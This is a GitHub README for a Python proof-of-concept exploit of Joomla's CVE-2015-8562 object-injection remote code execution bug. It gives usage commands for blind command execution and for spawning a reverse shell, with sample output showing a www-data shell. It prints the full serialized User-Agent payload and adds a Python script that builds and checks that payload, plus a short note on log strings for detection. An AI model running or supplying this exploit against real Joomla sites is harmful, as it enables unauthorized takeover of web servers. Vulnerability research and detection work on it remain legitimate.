Project author: VoidSec

Project description:
A proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)
Language: Python
Project URL: git://github.com/VoidSec/Joomla_CVE-2015-8562.git
Created: 2017-09-17T15:03:53Z
Project community: https://github.com/VoidSec/Joomla_CVE-2015-8562

License:



Joomla_CVE-2015-8562

A proof of concept for Joomla’s CVE-2015-8562 vulnerability (Object Injection RCE)

Intro/Changelog

This PoC is a second, revised version of the implementation hosted on exploit-db.

  1. Fixed session regeneration
  2. Added an option to switch from the X-Forwarded-For method to the User-Agent method
  3. Added an option to switch from a Python reverse shell to a Bash one
  4. Added exception handling for a missing http:// scheme in the target URL and for script termination
  5. Edited for better usage text, messages and colors
  6. TODO: add Metasploit (msf) support

How to Use

  1. git clone https://github.com/VoidSec/Joomla_CVE-2015-8562.git
  2. cd Joomla_CVE-2015-8562

Blind RCE (the command runs on the target, but its output is not returned):

  python joomla-cve-2015-8562.py -t http://<target_ip>/ --cmd
  $ touch /tmp/test

Spawn Reverse Shell:

  python joomla-cve-2015-8562.py -t http://<target_ip>/ -l <local_ip> -p <local_port>
  [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://<target_ip>/
  [-] Uploading python reverse shell
  <Response [200]>
  [+] Spawning reverse shell....
  <Response [200]>
  Listening on [0.0.0.0] (family 0, port 1337)
  $ id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)

CVE-2015-8562

In December 2015 a new vulnerability was found in Joomla. It lets a remote, unauthenticated attacker carry out a PHP object injection attack and execute arbitrary PHP code via the HTTP User-Agent header (the X-Forwarded-For header is stored in the session the same way and works as an alternative).

This vulnerability affects Joomla 1.5.0 through 3.4.5 running on a PHP version before 5.4.45 (5.3.x included), 5.5.29 or 5.6.13, i.e. a PHP still affected by CVE-2015-6835, the session deserializer bug that lets the injected session entry be unserialized.

I have written a blog post explaining the vulnerability.

This is what the sent User-Agent header looks like (broken across lines here for readability; on the wire it is a single header value). The leading } closes the session entry Joomla is writing, __test| opens a new entry holding the injected object, and the trailing non-UTF-8 bytes make MySQL truncate the stored session data at that point, so the session decoder reaches the injected entry intact. Note that \0\0\0 stands for six literal characters: Joomla's database session storage replaces them with the chr(0)*chr(0) protected-property marker on read, which is why the declared lengths s:21 and s:13 are three bytes shorter than the text shown.

  }__test|O:21:"JDatabaseDriverMysqli":3:{
  s:2:"fc";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
  i:0;
  a:2:{
  i:0;
  O:9:"SimplePie":5:{
  s:8:"sanitize";
  O:20:"JDatabaseDriverMysql":0:{}
  s:8:"feed_url";
  s:305:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(112).chr(121).chr(116).chr(104).chr(111).chr(110).chr(32).chr(47).chr(116).chr(109).chr(112).chr(47).chr(76).chr(56).chr(51).chr(55).chr(66).chr(72).chr(46).chr(112).chr(121).chr(39).chr(41).chr(59));
  JFactory::getConfig();
  exit";
  s:19:"cache_name_function";
  s:6:"assert";
  s:5:"cache";
  b:1;s:11:"cache_class";
  O:20:"JDatabaseDriverMysql":0:{}
  }
  i:1;
  s:4:"init";
  }
  }
  s:13:"\0\0\0connection";
  b:1;
  }ýýýý
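As an added example (not code from the VoidSec repository), the Python below builds the header above from a PHP snippet and then parses it back with a minimal reader for PHP's serialize() format, so every declared length can be checked before anything is sent. It assumes the terminator bytes \xf0\xfd\xfd\xfd used by the exploit-db PoC this tool descends from, and the \0\0\0 rewrite done by Joomla's database session storage; the command string is the one decoded from the s:305 value above. It only constructs and inspects the string; it does not talk to a server.

```python
from collections import namedtuple

PhpObject = namedtuple("PhpObject", "cls props")

# Joomla's JSessionStorageDatabase writes the protected-property marker
# chr(0).'*'.chr(0) to MySQL as the six literal characters \0\0\0 and undoes
# that in read(); the declared lengths count the three bytes after read().
PROTECTED = r"\0\0\0"
# Assumption: invalid UTF-8 tail; a 3-byte utf8 MySQL column truncates here.
TERMINATOR = b"\xf0\xfd\xfd\xfd"


def php_chr_encode(code: str) -> str:
    """Spell PHP code as chr(n).chr(n)... so the header carries no quotes."""
    return ".".join("chr(%d)" % b for b in code.encode("utf-8"))


def after_joomla_read(data: str) -> str:
    """What unserialize() sees once read() has restored the chr(0)*chr(0) marker."""
    return data.replace(PROTECTED, "\x00*\x00")


def php_str(value: str) -> str:
    """Serialize a PHP string; the length is the byte count after read()."""
    return 's:%d:"%s"' % (len(after_joomla_read(value).encode("utf-8")), value)


def build_payload(php_code: str) -> bytes:
    """User-Agent value that runs php_code via JDatabaseDriverMysqli::__destruct
    -> disconnect() -> disconnectHandlers -> SimplePie::init() -> assert(feed_url)."""
    feed_url = "eval(%s);JFactory::getConfig();exit" % php_chr_encode(php_code)
    simplepie = (
        'O:9:"SimplePie":5:{'
        + php_str("sanitize") + ';O:20:"JDatabaseDriverMysql":0:{}'
        + php_str("feed_url") + ";" + php_str(feed_url) + ";"
        + php_str("cache_name_function") + ";" + php_str("assert") + ";"
        + php_str("cache") + ";b:1;"
        + php_str("cache_class") + ';O:20:"JDatabaseDriverMysql":0:{}}'
    )
    driver = (
        'O:21:"JDatabaseDriverMysqli":3:{'
        + php_str("fc") + ';O:17:"JSimplepieFactory":0:{}'
        + php_str(PROTECTED + "disconnectHandlers") + ";"
        + "a:1:{i:0;a:2:{i:0;" + simplepie + "i:1;" + php_str("init") + ";}}"
        + php_str(PROTECTED + "connection") + ";b:1;}"
    )
    # "}" closes the session entry Joomla is writing; "__test|" opens a new one.
    return b"}__test|" + driver.encode("utf-8") + TERMINATOR


def php_unserialize(data: str, pos: int = 0):
    """Parse the subset of serialize() output the chain uses (i, b, s, a, O).
    Returns (value, next_pos); raises ValueError where PHP's unserialize() fails."""
    tag = data[pos]
    if tag in "ib":
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return (int(raw) if tag == "i" else raw == "1"), end + 1
    colon = data.index(":", pos + 2)
    count = int(data[pos + 2:colon])
    if tag == "s":
        start = colon + 2                          # skip ':"'
        if data[start + count:start + count + 2] != '";':
            raise ValueError("bad string length %d at offset %d" % (count, pos))
        return data[start:start + count], start + count + 2
    items, cls = {}, None
    if tag == "O":
        cls = data[colon + 2:colon + 2 + count]
        pos = colon + 2 + count + 2                # skip '":'
        colon = data.index(":", pos)
        count = int(data[pos:colon])               # property count
    elif tag != "a":
        raise ValueError("unsupported type %r at offset %d" % (tag, pos))
    pos = colon + 2                                # skip ':{'
    for _ in range(count):
        key, pos = php_unserialize(data, pos)
        items[key], pos = php_unserialize(data, pos)
    if data[pos] != "}":
        raise ValueError("missing '}' at offset %d" % pos)
    return (PhpObject(cls, items) if tag == "O" else items), pos + 1


def header_body(user_agent: bytes) -> str:
    """Drop the session-key prefix and the terminator from a captured header."""
    return user_agent[len(b"}__test|"):].split(TERMINATOR, 1)[0].decode("utf-8")


def lengths_ok(serialized: str) -> bool:
    """True when every declared length matches what unserialize() will read."""
    try:
        return php_unserialize(serialized)[1] == len(serialized)
    except (ValueError, IndexError):
        return False


def decode_header(user_agent: bytes) -> PhpObject:
    """Recover the injected object the way Joomla and PHP end up seeing it."""
    return php_unserialize(after_joomla_read(header_body(user_agent)))[0]


if __name__ == "__main__":
    ua = build_payload("system('python /tmp/L837BH.py');")  # command from the header above
    print("raw lengths ok:", lengths_ok(header_body(ua)),
          "| after read():", lengths_ok(after_joomla_read(header_body(ua))))
    chain = decode_header(ua)
    obj, method = chain.props["\x00*\x00disconnectHandlers"][0].values()
    print(chain.cls, "->", "%s::%s" % (obj.cls, method), "->", obj.props["cache_name_function"] + "(feed_url)")
```

Run stand-alone it reports that the raw header fails the length check (the \0\0\0 markers are six characters on the wire but three after Joomla's read()), while the post-read form parses cleanly into JDatabaseDriverMysqli -> SimplePie::init -> assert(feed_url). The same fixed substrings, the }__test| prefix and s:21:"\0\0\0disconnectHandlers", are also what to grep for in web-server logs and the session table when looking for exploitation attempts.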